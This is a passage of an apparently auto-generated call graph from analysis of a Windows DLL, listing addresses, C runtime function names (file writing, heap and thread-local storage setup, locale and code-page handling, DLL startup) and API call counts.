19710 6fa55348 __strnicoll_l 62 API calls 19707->19710 19711 6fa5815c __strnicoll_l 6 API calls 19708->19711 19718 6fa5401d 19709->19718 19712 6fa54151 19710->19712 19716 6fa54137 19711->19716 19715 6fa5815c __strnicoll_l 6 API calls 19712->19715 19715->19716 19716->19690 19717 6fa55348 __strnicoll_l 62 API calls 19717->19712 19719 6fa5404d 19718->19719 19720 6fa5402d 19718->19720 19721 6fa5407d 19719->19721 19723 6fa5405d 19719->19723 19722 6fa55348 __strnicoll_l 62 API calls 19720->19722 19729 6fa540c4 19721->19729 19731 6fa54042 19721->19731 19733 6fa584f5 19721->19733 19724 6fa54032 19722->19724 19725 6fa55348 __strnicoll_l 62 API calls 19723->19725 19726 6fa5815c __strnicoll_l 6 API calls 19724->19726 19727 6fa54062 19725->19727 19726->19731 19728 6fa5815c __strnicoll_l 6 API calls 19727->19728 19728->19731 19729->19731 19732 6fa584f5 __flsbuf 96 API calls 19729->19732 19731->19716 19731->19717 19732->19731 19754 6fa5fbb6 19733->19754 19736 6fa58527 19739 6fa58538 __flsbuf 19736->19739 19740 6fa5852b 19736->19740 19737 6fa58510 19738 6fa55348 __strnicoll_l 62 API calls 19737->19738 19742 6fa58515 19738->19742 19739->19742 19750 6fa5858e 19739->19750 19753 6fa58599 19739->19753 19760 6fa5f99d 19739->19760 19741 6fa55348 __strnicoll_l 62 API calls 19740->19741 19741->19742 19742->19729 19743 6fa58628 19745 6fa5f878 __locking 96 API calls 19743->19745 19744 6fa585a8 19746 6fa585bf 19744->19746 19749 6fa585dc 19744->19749 19745->19742 19772 6fa5f878 19746->19772 19749->19742 19797 6fa5f02c 19749->19797 19750->19753 19769 6fa5f954 19750->19769 19753->19743 19753->19744 19755 6fa5fbc5 19754->19755 19757 6fa58505 19754->19757 19756 6fa55348 __strnicoll_l 62 API calls 19755->19756 19758 6fa5fbca 19756->19758 19757->19736 19757->19737 19759 6fa5815c __strnicoll_l 6 API calls 19758->19759 19759->19757 19761 6fa5f9b9 19760->19761 19762 6fa5f9aa 19760->19762 19765 6fa5f9dd 19761->19765 19766 6fa55348 __strnicoll_l 62 API calls 19761->19766 19763 6fa55348 __strnicoll_l 62 API calls 19762->19763 19764 6fa5f9af 19763->19764 19764->19750 19765->19750 19767 6fa5f9cd 19766->19767 19768 6fa5815c __strnicoll_l 6 API calls 19767->19768 19768->19765 19770 6fa5a5c3 __malloc_crt 62 API calls 19769->19770 19771 6fa5f969 19770->19771 19771->19753 19773 6fa5f884 __freefls@4 19772->19773 19774 6fa5f8a7 19773->19774 19775 6fa5f88c 19773->19775 19776 6fa5f8b5 19774->19776 19781 6fa5f8f6 19774->19781 19829 6fa5535b 19775->19829 19778 6fa5535b __locking 62 API calls 19776->19778 19780 6fa5f8ba 19778->19780 19784 6fa55348 __strnicoll_l 62 API calls 19780->19784 19832 6fa619c1 19781->19832 19782 6fa55348 __strnicoll_l 62 API calls 19783 6fa5f899 __freefls@4 19782->19783 19783->19742 19786 6fa5f8c1 19784->19786 19788 6fa5815c __strnicoll_l 6 API calls 19786->19788 19787 6fa5f8fc 19789 6fa5f91f 19787->19789 19790 6fa5f909 19787->19790 19788->19783 19792 6fa55348 __strnicoll_l 62 API calls 19789->19792 19842 6fa5f145 19790->19842 19794 6fa5f924 19792->19794 19793 6fa5f917 19901 6fa5f94a 19793->19901 19795 6fa5535b __locking 62 API calls 19794->19795 19795->19793 19798 6fa5f038 __freefls@4 19797->19798 19799 6fa5f065 19798->19799 19800 6fa5f049 19798->19800 19802 6fa5f073 19799->19802 19804 6fa5f094 19799->19804 19801 6fa5535b __locking 62 API calls 19800->19801 19803 6fa5f04e 19801->19803 19805 6fa5535b __locking 62 API calls 19802->19805 19808 6fa55348 __strnicoll_l 62 API calls 19803->19808 19806 6fa5f0b4 19804->19806 19807 6fa5f0da 19804->19807 19809 6fa5f078 19805->19809 19810 6fa5535b __locking 62 API calls 19806->19810 19811 6fa619c1 ___lock_fhandle 63 API calls 19807->19811 19821 6fa5f056 __freefls@4 19808->19821 19812 6fa55348 __strnicoll_l 62 API calls 19809->19812 19813 6fa5f0b9 19810->19813 19814 6fa5f0e0 19811->19814 19815 6fa5f07f 19812->19815 19816 6fa55348 __strnicoll_l 62 API calls 19813->19816 19817 6fa5f0ed 19814->19817 19818 6fa5f109 19814->19818 19819 6fa5815c __strnicoll_l 6 API calls 19815->19819 19820 6fa5f0c0 19816->19820 19822 6fa5efa7 __lseeki64_nolock 64 API calls 19817->19822 19823 6fa55348 __strnicoll_l 62 API calls 19818->19823 19819->19821 19824 6fa5815c __strnicoll_l 6 API calls 19820->19824 19821->19742 19825 6fa5f0fe 19822->19825 19826 6fa5f10e 19823->19826 19824->19821 19948 6fa5f13b 19825->19948 19827 6fa5535b __locking 62 API calls 19826->19827 19827->19825 19830 6fa5a206 __getptd_noexit 62 API calls 19829->19830 19831 6fa55360 19830->19831 19831->19782 19833 6fa619cd __freefls@4 19832->19833 19834 6fa61a28 19833->19834 19835 6fa5a914 __lock 62 API calls 19833->19835 19836 6fa61a2d EnterCriticalSection 19834->19836 19837 6fa61a4a __freefls@4 19834->19837 19838 6fa619f9 19835->19838 19836->19837 19837->19787 19839 6fa61a10 19838->19839 19840 6fa5e1d3 __ioinit InitializeCriticalSectionAndSpinCount 19838->19840 19904 6fa61a58 19839->19904 19840->19839 19843 6fa5f154 __write_nolock 19842->19843 19844 6fa5f186 19843->19844 19845 6fa5f1ad 19843->19845 19875 6fa5f17b 19843->19875 19847 6fa5535b __locking 62 API calls 19844->19847 19848 6fa5f215 19845->19848 19849 6fa5f1ef 19845->19849 19846 6fa53f34 ___strgtold12_l 5 API calls 19850 6fa5f876 19846->19850 19851 6fa5f18b 19847->19851 19853 6fa5f229 19848->19853 19908 6fa5efa7 19848->19908 19852 6fa5535b __locking 62 API calls 19849->19852 19850->19793 19854 6fa55348 __strnicoll_l 62 API calls 19851->19854 19855 6fa5f1f4 19852->19855 19858 6fa5f99d __flsbuf 62 API calls 19853->19858 19857 6fa5f192 19854->19857 19859 6fa55348 __strnicoll_l 62 API calls 19855->19859 19860 6fa5815c __strnicoll_l 6 API calls 19857->19860 19861 6fa5f234 19858->19861 19862 6fa5f1fd 19859->19862 19860->19875 19863 6fa5f4da 19861->19863 19918 6fa5a27f 19861->19918 19864 6fa5815c __strnicoll_l 6 API calls 19862->19864 19866 6fa5f7a9 WriteFile 19863->19866 19867 6fa5f4ea 19863->19867 19864->19875 19870 6fa5f4bc 19866->19870 19871 6fa5f7dc GetLastError 19866->19871 19868 6fa5f5c8 19867->19868 19890 6fa5f4fe 19867->19890 19888 6fa5f6a8 19868->19888 19893 6fa5f5d7 19868->19893 19872 6fa5f827 19870->19872 19870->19875 19877 6fa5f7fa 19870->19877 19871->19870 19872->19875 19876 6fa55348 __strnicoll_l 62 API calls 19872->19876 19873 6fa5f27a 19873->19863 19874 6fa5f28c GetConsoleCP 19873->19874 19874->19870 19899 6fa5f2af 19874->19899 19875->19846 19879 6fa5f84a 19876->19879 19881 6fa5f805 19877->19881 19882 6fa5f819 19877->19882 19878 6fa5f56c WriteFile 19878->19871 19878->19890 19886 6fa5535b __locking 62 API calls 19879->19886 19880 6fa5f70e WideCharToMultiByte 19880->19871 19883 6fa5f745 WriteFile 19880->19883 19887 6fa55348 __strnicoll_l 62 API calls 19881->19887 19926 6fa5536e 19882->19926 19883->19888 19889 6fa5f77c GetLastError 19883->19889 19884 6fa5f64c WriteFile 19884->19871 19884->19893 19886->19875 19891 6fa5f80a 19887->19891 19888->19870 19888->19872 19888->19880 19888->19883 19889->19888 19890->19870 19890->19872 19890->19878 19892 6fa5535b __locking 62 API calls 19891->19892 19892->19875 19893->19870 19893->19872 19893->19884 19895 6fa60932 74 API calls __fassign 19895->19899 19896 6fa5f35b WideCharToMultiByte 19896->19870 19897 6fa5f38c WriteFile 19896->19897 19897->19871 19897->19899 19898 6fa61a88 11 API calls __putwch_nolock 19898->19899 19899->19870 19899->19871 19899->19895 19899->19896 19899->19898 19900 6fa5f3e0 WriteFile 19899->19900 19923 6fa60984 19899->19923 19900->19871 19900->19899 19947 6fa61a61 LeaveCriticalSection 19901->19947 19903 6fa5f952 19903->19783 19907 6fa5a83a LeaveCriticalSection 19904->19907 19906 6fa61a5f 19906->19834 19907->19906 19931 6fa6194a 19908->19931 19910 6fa5efc5 19911 6fa5efcd 19910->19911 19912 6fa5efde SetFilePointer 19910->19912 19914 6fa55348 __strnicoll_l 62 API calls 19911->19914 19913 6fa5eff6 GetLastError 19912->19913 19916 6fa5efd2 19912->19916 19915 6fa5f000 19913->19915 19913->19916 19914->19916 19917 6fa5536e __dosmaperr 62 API calls 19915->19917 19916->19853 19917->19916 19919 6fa5a206 __getptd_noexit 62 API calls 19918->19919 19920 6fa5a287 19919->19920 19921 6fa5a294 GetConsoleMode 19920->19921 19922 6fa55bff __amsg_exit 62 API calls 19920->19922 19921->19863 19921->19873 19922->19921 19944 6fa6094c 19923->19944 19927 6fa5535b __locking 62 API calls 19926->19927 19928 6fa55379 __dosmaperr 19927->19928 19929 6fa55348 __strnicoll_l 62 API calls 19928->19929 19930 6fa5538c 19929->19930 19930->19875 19932 6fa61957 19931->19932 19933 6fa6196f 19931->19933 19934 6fa5535b __locking 62 API calls 19932->19934 19936 6fa5535b __locking 62 API calls 19933->19936 19943 6fa619b4 19933->19943 19935 6fa6195c 19934->19935 19937 6fa55348 __strnicoll_l 62 API calls 19935->19937 19938 6fa6199d 19936->19938 19939 6fa61964 19937->19939 19940 6fa55348 __strnicoll_l 62 API calls 19938->19940 19939->19910 19941 6fa619a4 19940->19941 19942 6fa5815c __strnicoll_l 6 API calls 19941->19942 19942->19943 19943->19910 19945 6fa58659 _LocaleUpdate::_LocaleUpdate 72 API calls 19944->19945 19946 6fa6095f 19945->19946 19946->19899 19947->19903 19951 6fa61a61 LeaveCriticalSection 19948->19951 19950 6fa5f143 19950->19821 19951->19950 19954 6fa47352 __EH_prolog3_catch_GS 19952->19954 19953 6fa47381 ctype 19958 6fa551c4 19953->19958 19954->19953 19955 6fa47202 ctype 66 API calls 19954->19955 19955->19953 19959 6fa53f34 ___strgtold12_l 5 API calls 19958->19959 19960 6fa551ce 19959->19960 19960->19960 19961 6fa672b3 19964 6fa48495 19961->19964 19965 6fa4aef1 ctype 31 API calls 19964->19965 19966 6fa484a0 19965->19966 19967 6fa4c220 ctype 7 API calls 19966->19967 19968 6fa484a9 19967->19968 19969 6fa4bbbf ctype 2 API calls 19968->19969 19970 6fa484b4 19969->19970 19971 6fa4c292 ctype 3 API calls 19970->19971 19972 6fa484bb 19971->19972 19973 6fa5498c 19974 6fa54997 19973->19974 19975 6fa5499c 19973->19975 19991 6fa5be02 19974->19991 19979 6fa54896 19975->19979 19978 6fa549aa 19981 6fa548a2 __freefls@4 19979->19981 19980 6fa548ef 19989 6fa5493f __freefls@4 19980->19989 20042 6fa46894 19980->20042 19981->19980 19981->19989 19995 6fa54761 19981->19995 19985 6fa5491f 19987 6fa54761 __CRT_INIT@12 155 API calls 19985->19987 19985->19989 19986 6fa46894 ___DllMainCRTStartup 31 API calls 19988 6fa54916 19986->19988 19987->19989 19990 6fa54761 __CRT_INIT@12 155 API calls 19988->19990 19989->19978 19990->19985 19992 6fa5be34 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 19991->19992 19993 6fa5be27 19991->19993 19994 6fa5be2b 19992->19994 19993->19992 19993->19994 19994->19975 19996 6fa54770 19995->19996 19997 6fa547ec 19995->19997 20046 6fa5a6f4 HeapCreate 19996->20046 19999 6fa54823 19997->19999 20000 6fa547f2 19997->20000 20001 6fa54881 19999->20001 20002 6fa54828 19999->20002 20005 6fa5480d 20000->20005 20031 6fa5477b 20000->20031 20179 6fa55e85 20000->20179 20001->20031 20182 6fa5a3c8 20001->20182 20004 6fa5a0ae ___set_flsgetvalue 8 API calls 20002->20004 20007 6fa5482d 20004->20007 20012 6fa5b77d __ioterm 63 API calls 20005->20012 20005->20031 20010 6fa5a608 __calloc_crt 62 API calls 20007->20010 20013 6fa54839 20010->20013 20011 6fa54787 __RTC_Initialize 20019 6fa54797 GetCommandLineA 20011->20019 20035 6fa5478b 20011->20035 20014 6fa54817 20012->20014 20017 6fa5a033 __decode_pointer 6 API calls 20013->20017 20013->20031 20016 6fa5a0e2 __mtterm 65 API calls 20014->20016 20018 6fa5481c 20016->20018 20024 6fa54857 20017->20024 20021 6fa5a724 __heap_term 4 API calls 20018->20021 20082 6fa5bafe 20019->20082 20021->20031 20026 6fa54875 20024->20026 20027 6fa5485e 20024->20027 20025 6fa547b1 20029 6fa547b5 20025->20029 20123 6fa5ba43 20025->20123 20028 6fa54618 __freebuf 62 API calls 20026->20028 20030 6fa5a11f __mtinit 62 API calls 20027->20030 20028->20031 20163 6fa5a0e2 20029->20163 20034 6fa54865 GetCurrentThreadId 20030->20034 20031->19980 20034->20031 20157 6fa5a724 20035->20157 20037 6fa547d5 20037->20031 20174 6fa5b77d 20037->20174 20043 6fa468a2 20042->20043 20044 6fa467cb 20042->20044 20043->20044 20045 6fa4aef1 ctype 31 API calls 20043->20045 20044->19985 20044->19986 20045->20044 20047 6fa54776 20046->20047 20047->20031 20048 6fa5a436 GetModuleHandleW 20047->20048 20049 6fa5a451 20048->20049 20050 6fa5a44a 20048->20050 20052 6fa5a5b9 20049->20052 20053 6fa5a45b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 20049->20053 20051 6fa55bcf __crt_waiting_on_module_handle 2 API calls 20050->20051 20054 6fa5a450 20051->20054 20056 6fa5a0e2 __mtterm 65 API calls 20052->20056 20055 6fa5a4a4 TlsAlloc 20053->20055 20054->20049 20058 6fa5a5be 20055->20058 20059 6fa5a4f2 TlsSetValue 20055->20059 20056->20058 20058->20011 20059->20058 20060 6fa5a503 20059->20060 20193 6fa55e94 20060->20193 20063 6fa59fb8 __encode_pointer 6 API calls 20064 6fa5a513 20063->20064 20065 6fa59fb8 __encode_pointer 6 API calls 20064->20065 20066 6fa5a523 20065->20066 20067 6fa59fb8 __encode_pointer 6 API calls 20066->20067 20068 6fa5a533 20067->20068 20069 6fa59fb8 __encode_pointer 6 API calls 20068->20069 20070 6fa5a543 20069->20070 20200 6fa5a798 20070->20200 20073 6fa5a033 __decode_pointer 6 API calls 20074 6fa5a564 20073->20074 20074->20052 20075 6fa5a608 __calloc_crt 62 API calls 20074->20075 20076 6fa5a57d 20075->20076 20076->20052 20077 6fa5a033 __decode_pointer 6 API calls 20076->20077 20078 6fa5a597 20077->20078 20078->20052 20079 6fa5a59e 20078->20079 20080 6fa5a11f __mtinit 62 API calls 20079->20080 20081 6fa5a5a6 GetCurrentThreadId 20080->20081 20081->20058 20083 6fa5bb1c GetEnvironmentStringsW 20082->20083 20084 6fa5bb3b 20082->20084 20085 6fa5bb24 20083->20085 20086 6fa5bb30 GetLastError 20083->20086 20084->20085 20087 6fa5bbd4 20084->20087 20089 6fa5bb57 GetEnvironmentStringsW 20085->20089 20090 6fa5bb66 WideCharToMultiByte 20085->20090 20086->20084 20088 6fa5bbdd GetEnvironmentStrings 20087->20088 20091 6fa547a7 20087->20091 20088->20091 20092 6fa5bbed 20088->20092 20089->20090 20089->20091 20095 6fa5bbc9 FreeEnvironmentStringsW 20090->20095 20096 6fa5bb9a 20090->20096 20108 6fa5b529 20091->20108 20097 6fa5a5c3 __malloc_crt 62 API calls 20092->20097 20095->20091 20098 6fa5a5c3 __malloc_crt 62 API calls 20096->20098 20099 6fa5bc07 20097->20099 20100 6fa5bba0 20098->20100 20101 6fa5bc0e FreeEnvironmentStringsA 20099->20101 20102 6fa5bc1a ___crtGetEnvironmentStringsA 20099->20102 20100->20095 20103 6fa5bba8 WideCharToMultiByte 20100->20103 20101->20091 20105 6fa5bc24 FreeEnvironmentStringsA 20102->20105 20104 6fa5bbba 20103->20104 20107 6fa5bbc2 20103->20107 20106 6fa54618 __freebuf 62 API calls 20104->20106 20105->20091 20106->20107 20107->20095 20207 6fa553bc 20108->20207 20110 6fa5b535 GetStartupInfoA 20111 6fa5a608 __calloc_crt 62 API calls 20110->20111 20119 6fa5b556 20111->20119 20112 6fa5b774 __freefls@4 20112->20025 20113 6fa5b63e 20113->20112 20115 6fa5b6bb 20113->20115 20120 6fa5b667 GetFileType 20113->20120 20122 6fa5e1d3 __ioinit InitializeCriticalSectionAndSpinCount 20113->20122 20114 6fa5b6f1 GetStdHandle 20114->20115 20115->20112 20115->20114 20117 6fa5b756 SetHandleCount 20115->20117 20118 6fa5b703 GetFileType 20115->20118 20121 6fa5e1d3 __ioinit InitializeCriticalSectionAndSpinCount 20115->20121 20116 6fa5a608 __calloc_crt 62 API calls 20116->20119 20117->20112 20118->20115 20119->20112 20119->20113 20119->20115 20119->20116 20120->20113 20121->20115 20122->20113 20124 6fa5ba5d GetModuleFileNameA 20123->20124 20125 6fa5ba58 20123->20125 20126 6fa5ba84 20124->20126 20214 6fa602ad 20125->20214 20208 6fa5b8a9 20126->20208 20130 6fa547c1 20130->20037 20136 6fa5b7cb 20130->20136 20131 6fa5bac0 20132 6fa5a5c3 __malloc_crt 62 API calls 20131->20132 20133 6fa5bac6 20132->20133 20133->20130 20134 6fa5b8a9 _parse_cmdline 72 API calls 20133->20134 20135 6fa5bae0 20134->20135 20135->20130 20137 6fa5b7d4 20136->20137 20139 6fa5b7d9 _strlen 20136->20139 20138 6fa602ad ___initmbctable 106 API calls 20137->20138 20138->20139 20140 6fa5a608 __calloc_crt 62 API calls 20139->20140 20143 6fa547ca 20139->20143 20145 6fa5b80e _strlen 20140->20145 20141 6fa5b86c 20142 6fa54618 __freebuf 62 API calls 20141->20142 20142->20143 20143->20037 20151 6fa55cbe 20143->20151 20144 6fa5a608 __calloc_crt 62 API calls 20144->20145 20145->20141 20145->20143 20145->20144 20146 6fa5b892 20145->20146 20148 6fa60997 _strcpy_s 62 API calls 20145->20148 20149 6fa5b853 20145->20149 20147 6fa54618 __freebuf 62 API calls 20146->20147 20147->20143 20148->20145 20149->20145 20150 6fa58034 __invoke_watson 10 API calls 20149->20150 20150->20149 20153 6fa55ccc __IsNonwritableInCurrentImage 20151->20153 20501 6fa5df82 20153->20501 20154 6fa55cea __initterm_e 20156 6fa55d09 __IsNonwritableInCurrentImage __initterm 20154->20156 20505 6fa544b4 20154->20505 20156->20037 20158 6fa5a784 HeapDestroy 20157->20158 20159 6fa5a72d 20157->20159 20158->20031 20160 6fa5a772 HeapFree 20159->20160 20161 6fa5a749 VirtualFree HeapFree 20159->20161 20160->20158 20161->20161 20162 6fa5a771 20161->20162 20162->20160 20164 6fa5a0f8 20163->20164 20165 6fa5a0ec 20163->20165 20167 6fa5a10c TlsFree 20164->20167 20168 6fa5a11a 20164->20168 20166 6fa5a033 __decode_pointer 6 API calls 20165->20166 20166->20164 20167->20168 20169 6fa5a7ff DeleteCriticalSection 20168->20169 20170 6fa5a817 20168->20170 20171 6fa54618 __freebuf 62 API calls 20169->20171 20172 6fa5a829 DeleteCriticalSection 20170->20172 20173 6fa5a837 20170->20173 20171->20168 20172->20170 20173->20035 20176 6fa5b786 20174->20176 20175 6fa5b7c8 20175->20029 20176->20175 20177 6fa5b79a DeleteCriticalSection 20176->20177 20178 6fa54618 __freebuf 62 API calls 20176->20178 20177->20176 20178->20176 20551 6fa55d43 20179->20551 20181 6fa55e90 20181->20005 20183 6fa5a3d6 20182->20183 20184 6fa5a421 20182->20184 20185 6fa5a3ff 20183->20185 20186 6fa5a3dc TlsGetValue 20183->20186 20187 6fa5a434 20184->20187 20188 6fa5a42b TlsSetValue 20184->20188 20190 6fa5a033 __decode_pointer 6 API calls 20185->20190 20186->20185 20189 6fa5a3ef TlsGetValue 20186->20189 20187->20031 20188->20187 20189->20185 20191 6fa5a416 20190->20191 20574 6fa5a299 20191->20574 20194 6fa5a02a __init_pointers 6 API calls 20193->20194 20195 6fa55e9c __init_pointers __initp_misc_winsig 20194->20195 20204 6fa5cdf3 20195->20204 20198 6fa59fb8 __encode_pointer 6 API calls 20199 6fa55ed8 20198->20199 20199->20063 20201 6fa5a7a3 20200->20201 20202 6fa5e1d3 __ioinit InitializeCriticalSectionAndSpinCount 20201->20202 20203 6fa5a550 20201->20203 20202->20201 20203->20052 20203->20073 20205 6fa59fb8 __encode_pointer 6 API calls 20204->20205 20206 6fa55ece 20205->20206 20206->20198 20207->20110 20209 6fa5b8c8 20208->20209 20213 6fa5b935 20209->20213 20218 6fa60a52 20209->20218 20211 6fa5ba33 20211->20130 20211->20131 20212 6fa60a52 72 API calls _parse_cmdline 20212->20213 20213->20211 20213->20212 20215 6fa602b6 20214->20215 20216 6fa602bd 20214->20216 20323 6fa60113 20215->20323 20216->20124 20221 6fa609ff 20218->20221 20224 6fa58659 20221->20224 20225 6fa5866c 20224->20225 20229 6fa586b9 20224->20229 20226 6fa5a27f __getptd 62 API calls 20225->20226 20227 6fa58671 20226->20227 20230 6fa58699 20227->20230 20232 6fa6057a 20227->20232 20229->20209 20230->20229 20247 6fa5fe0e 20230->20247 20233 6fa60586 __freefls@4 20232->20233 20234 6fa5a27f __getptd 62 API calls 20233->20234 20235 6fa6058b 20234->20235 20236 6fa605b9 20235->20236 20238 6fa6059d 20235->20238 20237 6fa5a914 __lock 62 API calls 20236->20237 20239 6fa605c0 20237->20239 20240 6fa5a27f __getptd 62 API calls 20238->20240 20263 6fa6053c 20239->20263 20242 6fa605a2 20240->20242 20244 6fa605b0 __freefls@4 20242->20244 20246 6fa55bff __amsg_exit 62 API calls 20242->20246 20244->20230 20246->20244 20248 6fa5fe1a __freefls@4 20247->20248 20249 6fa5a27f __getptd 62 API calls 20248->20249 20250 6fa5fe1f 20249->20250 20251 6fa5a914 __lock 62 API calls 20250->20251 20253 6fa5fe31 20250->20253 20252 6fa5fe4f 20251->20252 20255 6fa5fe98 20252->20255 20258 6fa5fe66 InterlockedDecrement 20252->20258 20259 6fa5fe80 InterlockedIncrement 20252->20259 20254 6fa5fe3f __freefls@4 20253->20254 20256 6fa55bff __amsg_exit 62 API calls 20253->20256 20254->20229 20319 6fa5fea9 20255->20319 20256->20254 20258->20259 20260 6fa5fe71 20258->20260 20259->20255 20260->20259 20261 6fa54618 __freebuf 62 API calls 20260->20261 20262 6fa5fe7f 20261->20262 20262->20259 20264 6fa60540 20263->20264 20270 6fa60572 20263->20270 20265 6fa60414 ___addlocaleref 8 API calls 20264->20265 20264->20270 20266 6fa60553 20265->20266 20266->20270 20274 6fa604a3 20266->20274 20271 6fa605e4 20270->20271 20318 6fa5a83a LeaveCriticalSection 20271->20318 20273 6fa605eb 20273->20242 20275 6fa60537 20274->20275 20276 6fa604b4 InterlockedDecrement 20274->20276 20275->20270 20288 6fa602cb 20275->20288 20277 6fa604cc 20276->20277 20278 6fa604c9 InterlockedDecrement 20276->20278 20279 6fa604d6 InterlockedDecrement 20277->20279 20280 6fa604d9 20277->20280 20278->20277 20279->20280 20281 6fa604e6 20280->20281 20282 6fa604e3 InterlockedDecrement 20280->20282 20283 6fa604f0 InterlockedDecrement 20281->20283 20284 6fa604f3 20281->20284 20282->20281 20283->20284 20285 6fa6050c InterlockedDecrement 20284->20285 20286 6fa6051c InterlockedDecrement 20284->20286 20287 6fa60527 InterlockedDecrement 20284->20287 20285->20284 20286->20284 20287->20275 20289 6fa602e2 20288->20289 20290 6fa6034f 20288->20290 20289->20290 20294 6fa60316 20289->20294 20299 6fa54618 __freebuf 62 API calls 20289->20299 20291 6fa54618 __freebuf 62 API calls 20290->20291 20317 6fa6039c 20290->20317 20292 6fa60370 20291->20292 20296 6fa54618 __freebuf 62 API calls 20292->20296 20293 6fa62365 ___free_lc_time 62 API calls 20295 6fa603bc 20293->20295 20297 6fa60337 20294->20297 20307 6fa54618 __freebuf 62 API calls 20294->20307 20298 6fa54618 __freebuf 62 API calls 20295->20298 20301 6fa60383 20296->20301 20303 6fa54618 __freebuf 62 API calls 20297->20303 20302 6fa603c3 20298->20302 20304 6fa6030b 20299->20304 20300 6fa60408 20305 6fa54618 __freebuf 62 API calls 20300->20305 20306 6fa54618 __freebuf 62 API calls 20301->20306 20302->20300 20313 6fa54618 62 API calls __freebuf 20302->20313 20308 6fa60344 20303->20308 20309 6fa6253f ___free_lconv_mon 62 API calls 20304->20309 20310 6fa6040e 20305->20310 20311 6fa60391 20306->20311 20312 6fa6032c 20307->20312 20314 6fa54618 __freebuf 62 API calls 20308->20314 20309->20294 20310->20270 20315 6fa54618 __freebuf 62 API calls 20311->20315 20316 6fa624fa ___free_lconv_num 62 API calls 20312->20316 20313->20302 20314->20290 20315->20317 20316->20297 20317->20293 20317->20302 20318->20273 20322 6fa5a83a LeaveCriticalSection 20319->20322 20321 6fa5feb0 20321->20253 20322->20321 20324 6fa6011f __freefls@4 20323->20324 20325 6fa5a27f __getptd 62 API calls 20324->20325 20326 6fa60128 20325->20326 20327 6fa5fe0e __setmbcp 64 API calls 20326->20327 20328 6fa60132 20327->20328 20354 6fa5feb2 20328->20354 20331 6fa5a5c3 __malloc_crt 62 API calls 20332 6fa60153 20331->20332 20333 6fa60272 __freefls@4 20332->20333 20361 6fa5ff2e 20332->20361 20333->20216 20336 6fa60183 InterlockedDecrement 20338 6fa601a4 InterlockedIncrement 20336->20338 20339 6fa60193 20336->20339 20337 6fa6027f 20337->20333 20341 6fa60292 20337->20341 20344 6fa54618 __freebuf 62 API calls 20337->20344 20338->20333 20340 6fa601ba 20338->20340 20339->20338 20343 6fa54618 __freebuf 62 API calls 20339->20343 20340->20333 20346 6fa5a914 __lock 62 API calls 20340->20346 20342 6fa55348 __strnicoll_l 62 API calls 20341->20342 20342->20333 20345 6fa601a3 20343->20345 20344->20341 20345->20338 20348 6fa601ce InterlockedDecrement 20346->20348 20349 6fa6025d InterlockedIncrement 20348->20349 20350 6fa6024a 20348->20350 20371 6fa60274 20349->20371 20350->20349 20352 6fa54618 __freebuf 62 API calls 20350->20352 20353 6fa6025c 20352->20353 20353->20349 20355 6fa58659 _LocaleUpdate::_LocaleUpdate 72 API calls 20354->20355 20356 6fa5fec6 20355->20356 20357 6fa5fed1 GetOEMCP 20356->20357 20358 6fa5feef 20356->20358 20360 6fa5fee1 20357->20360 20359 6fa5fef4 GetACP 20358->20359 20358->20360 20359->20360 20360->20331 20360->20333 20362 6fa5feb2 getSystemCP 74 API calls 20361->20362 20363 6fa5ff4e 20362->20363 20364 6fa5ff59 setSBCS 20363->20364 20367 6fa5ff9d IsValidCodePage 20363->20367 20370 6fa5ffc2 _memset __setmbcp_nolock 20363->20370 20365 6fa53f34 ___strgtold12_l 5 API calls 20364->20365 20366 6fa60111 20365->20366 20366->20336 20366->20337 20367->20364 20368 6fa5ffaf GetCPInfo 20367->20368 20368->20364 20368->20370 20374 6fa5fc7b GetCPInfo 20370->20374 20500 6fa5a83a LeaveCriticalSection 20371->20500 20373 6fa6027b 20373->20333 20375 6fa5fd61 20374->20375 20378 6fa5fcaf _memset 20374->20378 20380 6fa53f34 ___strgtold12_l 5 API calls 20375->20380 20384 6fa62323 20378->20384 20382 6fa5fe0c 20380->20382 20382->20370 20383 6fa62124 ___crtLCMapStringA 97 API calls 20383->20375 20385 6fa58659 _LocaleUpdate::_LocaleUpdate 72 API calls 20384->20385 20386 6fa62336 20385->20386 20394 6fa62169 20386->20394 20389 6fa62124 20390 6fa58659 _LocaleUpdate::_LocaleUpdate 72 API calls 20389->20390 20391 6fa62137 20390->20391 20453 6fa61d7f 20391->20453 20395 6fa621b5 20394->20395 20396 6fa6218a GetStringTypeW 20394->20396 20397 6fa6229c 20395->20397 20398 6fa621a2 20395->20398 20396->20398 20399 6fa621aa GetLastError 20396->20399 20422 6fa64dbc GetLocaleInfoA 20397->20422 20400 6fa621ee MultiByteToWideChar 20398->20400 20417 6fa62296 20398->20417 20399->20395 20407 6fa6221b 20400->20407 20400->20417 20403 6fa53f34 ___strgtold12_l 5 API calls 20404 6fa5fd1c 20403->20404 20404->20389 20405 6fa622ed GetStringTypeA 20410 6fa62308 20405->20410 20405->20417 20406 6fa62230 _memset __crtLCMapStringA_stat 20409 6fa62269 MultiByteToWideChar 20406->20409 20406->20417 20407->20406 20411 6fa549fe _malloc 62 API calls 20407->20411 20412 6fa62290 20409->20412 20413 6fa6227f GetStringTypeW 20409->20413 20414 6fa54618 __freebuf 62 API calls 20410->20414 20411->20406 20418 6fa61006 20412->20418 20413->20412 20414->20417 20417->20403 20419 6fa61023 20418->20419 20420 6fa61012 20418->20420 20419->20417 20420->20419 20421 6fa54618 __freebuf 62 API calls 20420->20421 20421->20419 20423 6fa64def 20422->20423 20424 6fa64dea 20422->20424 20425 6fa61026 ___ansicp 85 API calls 20423->20425 20426 6fa53f34 ___strgtold12_l 5 API calls 20424->20426 20425->20424 20427 6fa622c0 20426->20427 20427->20405 20427->20417 20428 6fa64e05 20427->20428 20429 6fa64e45 GetCPInfo 20428->20429 20433 6fa64ecf 20428->20433 20430 6fa64e5c 20429->20430 20431 6fa64eba MultiByteToWideChar 20429->20431 20430->20431 20434 6fa64e62 GetCPInfo 20430->20434 20431->20433 20437 6fa64e75 _strlen 20431->20437 20432 6fa53f34 ___strgtold12_l 5 API calls 20435 6fa622e1 20432->20435 20433->20432 20434->20431 20436 6fa64e6f 20434->20436 20435->20405 20435->20417 20436->20431 20436->20437 20438 6fa549fe _malloc 62 API calls 20437->20438 20442 6fa64ea7 _memset __crtLCMapStringA_stat 20437->20442 20438->20442 20439 6fa64f04 MultiByteToWideChar 20440 6fa64f1c 20439->20440 20441 6fa64f3b 20439->20441 20443 6fa64f23 WideCharToMultiByte 20440->20443 20444 6fa64f40 20440->20444 20445 6fa61006 __freea 62 API calls 20441->20445 